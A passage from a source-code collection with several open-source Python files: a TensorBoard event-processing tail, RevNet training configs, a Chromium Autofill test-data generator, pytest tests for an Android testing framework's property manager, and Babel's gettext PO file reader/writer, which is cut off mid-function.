return ('Detected out of order event.step likely caused by '
'a TensorFlow restart. Purging expired events from Tensorboard'
' display between the previous step: {} (timestamp: {}) and '
'current step: {} (timestamp: {}). Removing {} scalars, {} '
'histograms, {} compressed histograms, {} images, '
'and {} audio.').format(most_recent_step, most_recent_wall_time,
event_step, event_wall_time,
num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio)
def _GeneratorFromPath(path):
"""Create an event generator for file or directory at given path string."""
if not path:
raise ValueError('path must be a valid string')
if IsTensorFlowEventsFile(path):
return event_file_loader.EventFileLoader(path)
else:
return directory_watcher.DirectoryWatcher(
path, event_file_loader.EventFileLoader, IsTensorFlowEventsFile)
def _ParseFileVersion(file_version):
"""Convert the string file_version in event.proto into a float.
Args:
file_version: String file_version from event.proto
Returns:
Version number as a float.
"""
tokens = file_version.split('brain.Event:')
try:
return float(tokens[-1])
except ValueError:
## This should never happen according to the definition of file_version
## specified in event.proto.
logging.warn(('Invalid event.proto file_version. Defaulting to use of '
'out-of-order event.step logic for purging expired events.'))
return -1
def _CompressHistogram(histo_ev, bps):
"""Creates fixed size histogram by adding compression to accumulated state.
This routine transforms a histogram at a particular step by linearly
interpolating its variable number of buckets to represent their cumulative
weight at a constant number of compression points. This significantly reduces
the size of the histogram and makes it suitable for a two-dimensional area
plot where the output of this routine constitutes the ranges for a single x
coordinate.
Args:
histo_ev: A HistogramEvent namedtuple.
bps: Compression points represented in basis points, 1/100ths of a percent.
Returns:
CompressedHistogramEvent namedtuple.
"""
# See also: Histogram::Percentile() in core/lib/histogram/histogram.cc
histo = histo_ev.histogram_value
if not histo.num:
return CompressedHistogramEvent(
histo_ev.wall_time,
histo_ev.step,
[CompressedHistogramValue(b, 0.0) for b in bps])
bucket = np.array(histo.bucket)
weights = (bucket * bps[-1] / (bucket.sum() or 1.0)).cumsum()
values = []
j = 0
while j < len(bps):
i = np.searchsorted(weights, bps[j], side='right')
while i < len(weights):
cumsum = weights[i]
cumsum_prev = weights[i - 1] if i > 0 else 0.0
if cumsum == cumsum_prev: # prevent remap divide by zero
i += 1
continue
if not i or not cumsum_prev:
lhs = histo.min
else:
lhs = max(histo.bucket_limit[i - 1], histo.min)
rhs = min(histo.bucket_limit[i], histo.max)
weight = _Remap(bps[j], cumsum_prev, cumsum, lhs, rhs)
values.append(CompressedHistogramValue(bps[j], weight))
j += 1
break
else:
break
while j < len(bps):
values.append(CompressedHistogramValue(bps[j], histo.max))
j += 1
return CompressedHistogramEvent(histo_ev.wall_time, histo_ev.step, values)
def _Remap(x, x0, x1, y0, y1):
"""Linearly map from [x0, x1] unto [y0, y1]."""
return y0 + (x - x0) * float(y1 - y0) / (x1 - x0)
| apache-2.0 |
dongjoon-hyun/tensorflow | tensorflow/contrib/eager/python/examples/revnet/config.py | 28 | 6581 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Reversible residual network compatible with eager execution.
Configuration in format of tf.contrib.training.HParams.
Supports CIFAR-10, CIFAR-100, and ImageNet datasets.
Reference [The Reversible Residual Network: Backpropagation
Without Storing Activations](https://arxiv.org/pdf/1707.04585.pdf)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def get_hparams_cifar_38():
"""RevNet-38 configurations for CIFAR-10/CIFAR-100."""
config = tf.contrib.training.HParams()
config.add_hparam("num_train_images", 50000)
config.add_hparam("num_eval_images", 10000)
config.add_hparam("init_filters", 32)
config.add_hparam("init_kernel", 3)
config.add_hparam("init_stride", 1)
config.add_hparam("n_rev_blocks", 3)
config.add_hparam("n_res", [3, 3, 3])
config.add_hparam("filters", [32, 64, 112])
config.add_hparam("strides", [1, 2, 2])
config.add_hparam("batch_size", 100)
config.add_hparam("bottleneck", False)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", False)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 32, 32))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (32, 32, 3))
config.add_hparam("data_format", "channels_last")
# Training details
config.add_hparam("weight_decay", 2e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [40000, 60000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3])
config.add_hparam("max_train_iter", 80000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 1000)
config.add_hparam("div255", True)
# This is imprecise, when training with validation set,
# we only have 40k images in training data
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
def get_hparams_cifar_110():
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
return config
def get_hparams_cifar_164():
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
config.use_bottleneck = True
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
return config
def get_hparams_imagenet_56():
"""RevNet-56 configurations for ImageNet."""
config = tf.contrib.training.HParams()
config.add_hparam("n_classes", 1000)
config.add_hparam("dataset", "ImageNet")
config.add_hparam("num_train_images", 1281167)
config.add_hparam("num_eval_images", 50000)
config.add_hparam("init_filters", 128)
config.add_hparam("init_kernel", 7)
config.add_hparam("init_stride", 2)
config.add_hparam("n_rev_blocks", 4)
config.add_hparam("n_res", [2, 2, 2, 2])
config.add_hparam("filters", [128, 256, 512, 832])
config.add_hparam("strides", [1, 2, 2, 2])
config.add_hparam("batch_size", 256)
config.add_hparam("bottleneck", True)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", True)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 224, 224))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (224, 224, 3))
config.add_hparam("data_format", "channels_last")
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
# Training details
config.add_hparam("weight_decay", 1e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [160000, 320000, 480000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3, 1e-4])
config.add_hparam("max_train_iter", 600000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 256)
config.add_hparam("div255", True)
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
def get_hparams_imagenet_104():
config = get_hparams_imagenet_56()
config.n_res = [2, 2, 11, 2]
return config
| apache-2.0 |
Crystalnix/BitPop | chrome/test/functional/autofill_dataset_generator.py | 11 | 9785 | #!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates profile dictionaries for Autofill.
Used to test autofill.AutofillTest.FormFillLatencyAfterSubmit.
Can be used as a stand alone script with -h to print out help text by running:
python autofill_dataset_generator.py -h
"""
import codecs
import logging
from optparse import OptionParser
import os
import random
import re
import sys
class NullHandler(logging.Handler):
def emit(self, record):
pass
class DatasetGenerator(object):
"""Generates a dataset of dictionaries.
The lists (such as address_construct, city_construct) define the way the
corresponding field is generated. They accomplish this by specifying a
list of function-args lists.
"""
address_construct = [
[ random.randint, 1, 10000],
[ None, u'foobar'],
[ random.choice, [ u'St', u'Ave', u'Ln', u'Ct', ]],
[ random.choice, [ u'#1', u'#2', u'#3', ]],
]
city_construct = [
[ random.choice, [ u'San Jose', u'San Francisco', u'Sacramento',
u'Los Angeles', ]],
]
state_construct = [
[ None, u'CA']
]
# These zip codes are now matched to the corresponding cities in
# city_construct.
zip_construct = [ u'95110', u'94109', u'94203', u'90120']
logger = logging.getLogger(__name__)
logger.addHandler(NullHandler())
log_handlers = {'StreamHandler': None}
def __init__(self, output_filename=None, logging_level=None):
"""Constructs dataset generator object.
Creates 'fields' data member which is a list of pair (two values) lists.
These pairs are comprised of a field key e.g. u'NAME_FIRST' and a
generator method e.g. self.GenerateNameFirst which will generate the value.
If we want the value to always be the same e.g. u'John' we can use this
instead of a method. We can even use None keyword which will give
a value of u''.
'output_pattern' for one field would have been: "{u'NAME_FIRST': u'%s',}"
which is ready to accept a value for the 'NAME_FIRST' field key once
this value is generated.
'output_pattern' is used in 'GenerateNextDict()' to generate the next
dict line.
Args:
output_filename: specified filename of generated dataset to be saved.
Default value is None and no saving takes place.
logging_level: set verbosity levels, default is None.
"""
if logging_level:
if not self.log_handlers['StreamHandler']:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
self.log_handlers['StreamHandler'] = console
self.logger.addHandler(console)
self.logger.setLevel(logging_level)
else:
if self.log_handlers['StreamHandler']:
self.logger.removeHandler(self.log_handlers['StreamHandler'])
self.log_handlers['StreamHandler'] = None
self.output_filename = output_filename
self.dict_no = 0
self.fields = [
[u'NAME_FIRST', self.GenerateNameFirst],
[u'NAME_MIDDLE', None],
[u'NAME_LAST', None],
[u'EMAIL_ADDRESS', self.GenerateEmail],
[u'COMPANY_NAME', None],
[u'ADDRESS_HOME_LINE1', self.GenerateAddress],
[u'ADDRESS_HOME_LINE2', None],
[u'ADDRESS_HOME_CITY', self.GenerateCity],
[u'ADDRESS_HOME_STATE', self.GenerateState],
[u'ADDRESS_HOME_ZIP', self.GenerateZip],
[u'ADDRESS_HOME_COUNTRY', u'United States'],
[u'PHONE_HOME_WHOLE_NUMBER', None],
]
self.next_dict = {}
# Using implicit line joining does not work well in this case as each line
# has to be strings and not function calls that may return strings.
self.output_pattern = u'{\'' + \
u', '.join([u'u"%s" : u"%%s"' % key for key, method in self.fields]) + \
u',}'
def _GenerateField(self, field_construct):
"""Generates each field in each dictionary.
Args:
field_construct: it is a list of lists.
The first value (index 0) of each containing list is a function or None.
The remaining values are the args. If function is None then arg is just
returned.
Example 1: zip_construct = [[ None, u'95110']]. There is one
containing list only and function here is None and arg is u'95110'.
This just returns u'95110'.
Example 2: address_construct = [ [ random.randint, 1, 10000],
[ None, u'foobar'] ] This has two containing lists and it will return
the result of:
random.randint(1, 10000) + ' ' + u'foobar'
which could be u'7832 foobar'
"""
parts = []
for function_and_args in field_construct:
function = function_and_args[0]
args = function_and_args[1:]
if not function:
function = lambda x: x
parts.append(str(function(*args)))
return (' ').join(parts)
def GenerateAddress(self):
"""Uses _GenerateField() and address_construct to gen a random address.
Returns:
A random address.
"""
return self._GenerateField(self.address_construct)
def GenerateCity(self):
"""Uses _GenerateField() and city_construct to gen a random city.
Returns:
A random city.
"""
return self._GenerateField(self.city_construct)
def GenerateState(self):
"""Uses _GenerateField() and state_construct to generate a state.
Returns:
A state.
"""
return self._GenerateField(self.state_construct)
def GenerateZip(self):
"""Uses zip_construct and generated cities to return a matched zip code.
Returns:
A zip code matched to the corresponding city.
"""
city_selected = self.next_dict['ADDRESS_HOME_CITY'][0]
index = self.city_construct[0][1].index(city_selected)
return self.zip_construct[index]
def GenerateCountry(self):
"""Uses _GenerateField() and country_construct to generate a country.
Returns:
A country.
"""
return self._GenerateField(self.country_construct)
def GenerateNameFirst(self):
"""Generates a numerical first name.
The name is the number of the current dict.
i.e. u'1', u'2', u'3'
Returns:
A numerical first name.
"""
return u'%s' % self.dict_no
def GenerateEmail(self):
"""Generates an email that corresponds to the first name.
i.e. u'[email protected]', u'[email protected]', u'[email protected]'
Returns:
An email address that corresponds to the first name.
"""
return u'%[email protected]' % self.dict_no
def GenerateNextDict(self):
"""Generates next dictionary of the dataset.
Returns:
The output dictionary.
"""
self.dict_no += 1
self.next_dict = {}
for key, method_or_value in self.fields:
if not method_or_value:
self.next_dict[key] = ['']
elif type(method_or_value) in [str, unicode]:
self.next_dict[key] = ['%s' % method_or_value]
else:
self.next_dict[key] = [method_or_value()]
return self.next_dict
def GenerateDataset(self, num_of_dict_to_generate=10):
"""Generates a list of dictionaries.
Args:
num_of_dict_to_generate: The number of dictionaries to be generated.
Default value is 10.
Returns:
The dictionary list.
"""
random.seed(0) # All randomly generated values are reproducible.
if self.output_filename:
output_file = codecs.open(
self.output_filename, mode='wb', encoding='utf-8-sig')
else:
output_file = None
try:
list_of_dict = []
if output_file:
output_file.write('[')
output_file.write(os.linesep)
while self.dict_no < num_of_dict_to_generate:
output_dict = self.GenerateNextDict()
list_of_dict.append(output_dict)
output_line = self.output_pattern % tuple(
[output_dict[key] for key, method in self.fields])
if output_file:
output_file.write(output_line)
output_file.write(os.linesep)
self.logger.info(
'%d: [%s]' % (self.dict_no, output_line.encode(sys.stdout.encoding,
'ignore')))
if output_file:
output_file.write(']')
output_file.write(os.linesep)
self.logger.info('%d dictionaries generated SUCCESSFULLY!', self.dict_no)
self.logger.info('--- FINISHED ---')
return list_of_dict
finally:
if output_file:
output_file.close()
def main():
parser = OptionParser()
parser.add_option(
'-o', '--output', dest='output_filename', default='',
help='write output to FILE [optional]', metavar='FILE')
parser.add_option(
'-d', '--dict', type='int', dest='dict_no', metavar='DICT_NO', default=10,
help='DICT_NO: number of dictionaries to be generated [default: %default]')
parser.add_option(
'-l', '--log_level', dest='log_level', default='debug',
metavar='LOG_LEVEL',
help='LOG_LEVEL: "debug", "info", "warning" or "error" [default: %default]')
(options, args) = parser.parse_args()
if args:
parser.print_help()
return 1
options.log_level = options.log_level.lower()
if options.log_level not in ['debug', 'info', 'warning', 'error']:
parser.error('Wrong log_level argument.')
parser.print_help()
else:
if options.log_level == 'debug':
options.log_level = logging.DEBUG
elif options.log_level == 'info':
options.log_level = logging.INFO
elif options.log_level == 'warning':
options.log_level = logging.WARNING
elif options.log_level == 'error':
options.log_level = logging.ERROR
gen = DatasetGenerator(options.output_filename, options.log_level)
gen.GenerateDataset(options.dict_no)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
jakev/dtf | python-dtf/tests/unit/test_prop.py | 2 | 5430 | # Android Device Testing Framework ("dtf")
# Copyright 2013-2016 Jake Valletta (@jake_valletta)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""pytest for using dtf property manager"""
from __future__ import absolute_import
import pytest
import dtf.properties as prop
import dtf.testutils as testutils
# prop_set() tests
def test_set_new_property():
"""Attempt to set a new property (existing section)"""
value = '1'
contents = ("[info]\n"
"real = not_real")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
def test_set_new_section_property():
"""Set a property that has no section (yet)"""
value = '1'
testutils.deploy_config_raw("")
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_existing_property():
"""Set a property that already exists"""
value = 'new'
contents = ("[Info]\n"
"sdk = old")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_property_casing():
"""Set a prop and try to retrieve with casing"""
sdk = '1'
testutils.deploy_config_raw("")
prop.set_prop('INFO', 'sdk', sdk)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_get() tests
def test_get_empty_config():
"""Attempts to get a property without a valid config"""
testutils.deploy_config_raw("")
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property():
"""Attempts to get a valid property"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
testutils.undeploy()
return 0
def test_get_property_no_option():
"""Attempt to get property that doesnt exist"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property_casing():
"""Get a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_del() tests
def test_del_empty_config():
"""Attempts to delete a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property():
"""Attempts to delete a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_del_property_invalid():
"""Attempts to delete a property that doesnt exist"""
contents = ("[Info]\n"
"vmtype = 64")
testutils.deploy_config_raw(contents)
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property_casing():
"""Delete a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
# prop_test() tests
def test_test_empty_config():
"""Test a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property():
"""Test a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
def test_test_invalid_property():
"""Test a missingproperty"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property_casing():
"""Test a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
| apache-2.0 |
krismcfarlin/todo_angular_endpoints_sockets | bp_includes/external/babel/messages/pofile.py | 54 | 16041 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
"""Reading and writing of files in the ``gettext`` PO (portable object)
format.
:see: `The Format of PO Files
<http://www.gnu.org/software/gettext/manual/gettext.html#PO-Files>`_
"""
from datetime import date, datetime
import os
import re
from babel import __version__ as VERSION
from babel.messages.catalog import Catalog, Message
from babel.util import set, wraptext, LOCALTZ
__all__ = ['read_po', 'write_po']
__docformat__ = 'restructuredtext en'
def unescape(string):
r"""Reverse `escape` the given string.
>>> print unescape('"Say:\\n \\"hello, world!\\"\\n"')
Say:
"hello, world!"
<BLANKLINE>
:param string: the string to unescape
:return: the unescaped string
:rtype: `str` or `unicode`
"""
return string[1:-1].replace('\\\\', '\\') \
.replace('\\t', '\t') \
.replace('\\r', '\r') \
.replace('\\n', '\n') \
.replace('\\"', '\"')
def denormalize(string):
r"""Reverse the normalization done by the `normalize` function.
>>> print denormalize(r'''""
... "Say:\n"
... " \"hello, world!\"\n"''')
Say:
"hello, world!"
<BLANKLINE>
>>> print denormalize(r'''""
... "Say:\n"
... " \"Lorem ipsum dolor sit "
... "amet, consectetur adipisicing"
... " elit, \"\n"''')
Say:
"Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
<BLANKLINE>
:param string: the string to denormalize
:return: the denormalized string
:rtype: `unicode` or `str`
"""
if string.startswith('""'):
lines = []
for line in string.splitlines()[1:]:
lines.append(unescape(line))
return ''.join(lines)
else:
return unescape(string)
def read_po(fileobj, locale=None, domain=None, ignore_obsolete=False):
"""Read messages from a ``gettext`` PO (portable object) file from the given
file-like object and return a `Catalog`.
>>> from StringIO import StringIO
>>> buf = StringIO('''
... #: main.py:1
... #, fuzzy, python-format
... msgid "foo %(name)s"
... msgstr ""
...
... # A user comment
... #. An auto comment
... #: main.py:3
... msgid "bar"
... msgid_plural "baz"
... msgstr[0] ""
... msgstr[1] ""
... ''')
>>> catalog = read_po(buf)
>>> catalog.revision_date = datetime(2007, 04, 01)
>>> for message in catalog:
... if message.id:
... print (message.id, message.string)
... print ' ', (message.locations, message.flags)
... print ' ', (message.user_comments, message.auto_comments)
(u'foo %(name)s', '')
([(u'main.py', 1)], set([u'fuzzy', u'python-format']))
([], [])
((u'bar', u'baz'), ('', ''))
([(u'main.py', 3)], set([]))
([u'A user comment'], [u'An auto comment'])
:param fileobj: the file-like object to read the PO file from
:param locale: the locale identifier or `Locale` object, or `None`
if the catalog is not bound to a locale (which basically
means it's a template)
:param domain: the message domain
:param ignore_obsolete: whether to ignore obsolete messages in the input
:return: an iterator over ``(message, translation, location)`` tuples
:rtype: ``iterator``
"""
catalog = Catalog(locale=locale, domain=domain)
counter = [0]
offset = [0]
messages = []
translations = []
locations = []
flags = []
user_comments = []
auto_comments = []
obsolete = [False]
in_msgid = [False]
in_msgstr = [False]
def _add_message():
translations.sort()
if len(messages) > 1:
msgid = tuple([denormalize(m) for m in messages])
else:
msgid = denormalize(messages[0])
if isinstance(msgid, (list, tuple)):
string = []
for idx in range(catalog.num_plurals):
try:
string.append(translations[idx])
except IndexError:
string.append((idx, ''))
string = tuple([denormalize(t[1]) for t in string])
else:
string = denormalize(translations[0][1])
message = Message(msgid, string, list(locations), set(flags),
auto_comments, user_comments, lineno=offset[0] + 1)
if obsolete[0]:
if not ignore_obsolete:
catalog.obsolete[msgid] = message
else:
catalog[msgid] = message
del messages[:]; del translations[:]; del locations[:];
del flags[:]; del auto_comments[:]; del user_comments[:]
obsolete[0] = False
counter[0] += 1
def _process_message_line(lineno, line):
if line.startswith('msgid_plural'):
in_msgid[0] = True
msg = line[12:].lstrip()
messages.append(msg)
elif line.startswith('msgid'):
in_msgid[0] = True
offset[0] = lineno
txt = line[5:].lstrip()
if messages:
_add_message()
messages.append(txt)
elif line.startswith('msgstr'):
in_msgid[0] = False
in_msgstr[0] = True
msg = line[6:].lstrip()
if msg.startswith('['):
idx, msg = msg[1:].split(']', 1)
translations.append([int(idx), msg.lstrip()])
else:
translations.append([0, msg])
elif line.startswith('"'):
if in_msgid[0]:
messages[-1] += u'\n' + line.rstrip()
elif in_msgstr[0]:
translations[-1][1] += u'\n' + line.rstrip()
for lineno, line in enumerate(fileobj.readlines()):
line = line.strip()
if not isinstance(line, unicode):
line = line.decode(catalog.charset)
if line.startswith('#'):
in_msgid[0] = in_msgstr[0] = False
if messages and translations:
_add_message()
if line[1:].startswith(':'):
for location in line[2:].lstrip().split():
pos = location.rfind(':')
if pos >= 0:
try:
lineno = int(location[pos + 1:])
except ValueError:
continue
locations.append((location[:pos], lineno))
elif line[1:].startswith(','):
for flag in line[2:].lstrip().split(','):
flags.append(flag.strip())
elif line[1:].startswith('~'):
obsolete[0] = True
_process_message_line(lineno, line[2:].lstrip())
elif line[1:].startswith('.'):
# These are called auto-comments
comment = line[2:].strip()
if comment: # Just check that we're not adding empty comments
auto_comments.append(comment)
else:
# These are called user comments
user_comments.append(line[1:].strip())
else:
_process_message_line(lineno, line)
if messages:
_add_message()
# No actual messages found, but there was some info in comments, from which
# we'll construct an empty header message
elif not counter[0] and (flags or user_comments or auto_comments):
messages.append(u'')
translations.append([0, u''])
_add_message()
return catalog
WORD_SEP = re.compile('('
r'\s+|' # any whitespace
r'[^\s\w]*\w+[a-zA-Z]-(?=\w+[a-zA-Z])|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w)' # em-dash
')')
def escape(string):
r"""Escape the given string so that it can be included in double-quoted
strings in ``PO`` files.
>>> escape('''Say:
... "hello, world!"
... ''')
'"Say:\\n \\"hello, world!\\"\\n"'
:param string: the string to escape
:return: the escaped string
:rtype: `str` or `unicode`
"""
return '"%s"' % string.replace('\\', '\\\\') \
.replace('\t', '\\t') \
.replace('\r', '\\r') \
.replace('\n', '\\n') \
.replace('\"', '\\"')
def normalize(string, prefix='', width=76):
r"""Convert a string into a format that is appropriate for .po files.
>>> print normalize('''Say:
... "hello, world!"
... ''', width=None)
""
"Say:\n"
" \"hello, world!\"\n"
>>> print normalize('''Say:
... "Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
... ''', width=32)
""
"Say:\n"
" \"Lorem ipsum dolor sit "
"amet, consectetur adipisicing"
" elit, \"\n"
:param string: the string to normalize
:param prefix: a string that should be prepended to every line
:param width: the maximum line width; use `None`, 0, or a negative number
to completely disable line wrapping
:return: the normalized string
:rtype: `unicode`
"""
if width and width > 0:
prefixlen = len(prefix)
lines = []
for idx, line in enumerate(string.splitlines(True)):
if len(escape(line)) + prefixlen > width:
chunks = WORD_SEP.split(line)
chunks.reverse()
while chunks:
buf = []
size = 2
while chunks:
l = len(escape(chunks[-1])) - 2 + prefixlen
if size + l < width:
buf.append(chunks.pop())
size += l
else:
if not buf:
# handle long chunks by putting them on a
# separate line
buf.append(chunks.pop())
break
lines.append(u''.join(buf))
else:
lines.append(line)
else:
lines = string.splitlines(True)
if len(lines) <= 1:
return escape(string)
# Remove empty trailing line
if lines and not lines[-1]:
del lines[-1]
lines[-1] += '\n'
return u'""\n' + u'\n'.join([(prefix + escape(l)) for l in lines])
def write_po(fileobj, catalog, width=76, no_location=False, omit_header=False,
sort_output=False, sort_by_file=False, ignore_obsolete=False,
include_previous=False):
r"""Write a ``gettext`` PO (portable object) template file for a given
message catalog to the provided file-like object.
>>> catalog = Catalog()
>>> catalog.add(u'foo %(name)s', locations=[('main.py', 1)],
... flags=('fuzzy',))
>>> catalog.add((u'bar', u'baz'), locations=[('main.py', 3)])
>>> from StringIO import StringIO
>>> buf = StringIO()
>>> write_po(buf, catalog, omit_header=True)
>>> print buf.getvalue()
#: main.py:1
#, fuzzy, python-format
msgid "foo %(name)s"
msgstr ""
<BLANKLINE>
#: main.py:3
msgid "bar"
msgid_plural "baz"
msgstr[0] ""
msgstr[1] ""
<BLANKLINE>
<BLANKLINE>
:param fileobj: the file-like object to write to
:param catalog: the `Catalog` instance
:param width: the maximum line width for the generated output; use `None`,
0, or a negative number to completely disable line wrapping
:param no_location: do not emit a location comment for every message
:param omit_header: do not include the ``msgid ""`` entry at the top of the
output
:param sort_output: whether to sort the messages in the output by msgid
:param sort_by_file: whether to sort the messages in the output by their
locations
:param ignore_obsolete: whether to ignore obsolete messages and not include
them in the output; by default they are included as
comments
:param include_previous: include the old msgid as a comment when
updating the catalog
"""
def _normalize(key, prefix=''):
return normalize(key, prefix=prefix, width=width) \
.encode(catalog.charset, 'backslashreplace')
def _write(text):
if isinstance(text, unicode):
text = text.encode(catalog.charset)
fileobj.write(text)
def _write_comment(comment, prefix=''):
# xgettext always wraps comments even if --no-wrap is passed;
# provide the same behaviour
if width and width > 0:
_width = width
else:
_width = 76
for line in wraptext(comment, _width):
_write('#%s %s\n' % (prefix, line.strip()))
def _write_message(message, prefix=''):
if isinstance(message.id, (list, tuple)):
_write('%smsgid %s\n' % (prefix, _normalize(message.id[0], prefix)))
_write('%smsgid_plural %s\n' % (
prefix, _normalize(message.id[1], prefix)
))
for idx in range(catalog.num_plurals):
try:
string = message.string[idx]
except IndexError:
string = ''
_write('%smsgstr[%d] %s\n' % (
prefix, idx, _normalize(string, prefix)
))
else:
_write('%smsgid %s\n' % (prefix, _normalize(message.id, prefix)))
_write('%smsgstr %s\n' % (
prefix, _normalize(message.string or '', prefix)
))
messages = list(catalog)
if sort_output:
messages.sort()
elif sort_by_file:
messages.sort(lambda x,y: cmp(x.locations, y.locations))
for message in messages:
if not message.id: # This is the header "message"
if omit_header:
continue
comment_header = catalog.header_comment
if width and width > 0:
lines = []
for line in comment_header.splitlines():
lines += wraptext(line, width=width,
subsequent_indent='# ')
comment_header = u'\n'.join(lines) + u'\n'
_write(comment_header)
for comment in message.user_comments:
